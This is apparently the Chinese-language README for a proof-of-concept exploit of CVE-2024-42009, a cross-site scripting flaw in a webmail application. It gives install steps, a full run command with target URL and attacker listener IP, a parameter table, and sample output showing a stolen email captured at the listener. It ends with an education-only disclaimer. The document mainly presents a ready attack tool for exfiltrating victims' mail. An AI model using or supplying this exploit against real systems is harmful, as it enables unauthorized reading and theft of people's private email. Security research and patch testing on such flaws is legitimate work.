本概念验证(PoC)演示了针对CVE-2024-42009漏洞的利用方法,利用跨站脚本(XSS)漏洞从目标Webmail应用程序中提取电子邮件。攻击注入恶意载荷,将邮件内容外泄到攻击者控制的监听器。
pip install requests beautifulsoup4
使用必要参数运行脚本:
python exploit.py -fu [email protected] -tu [email protected] -u http://target.com/contact -ip YOUR_IP -p 1337
| 参数 | 描述 |
|---|---|
-fu, --from-user | 发件人电子邮件地址 |
-tu, --to-user | 收件人电子邮件地址 |
-u, --target-url | 目标Webmail URL |
-ip, --server-ip | 攻击者监听器IP地址 |
-p, --server-port | 监听器端口(默认:1337) |
[*] CVE-2024-42009 PoC:正在监听 192.168.1.100:1337...
[*] 正在为UID 1发送载荷...
[+] 已为UID 1发送载荷(状态码:200)
[+] 捕获的邮件内容:
你好,这是一封测试邮件!
我不对该漏洞及其对应在本GitHub仓库中托管的所有漏洞利用代码主张权利/所有权/披露权——所有功劳归于发现该漏洞的研究人员;我只是基于互联网上的数据创建了一个PoC来复现该漏洞。 本PoC仅用于教育和研究目的。未经同意对系统进行非法测试是违法的!请负责任地使用!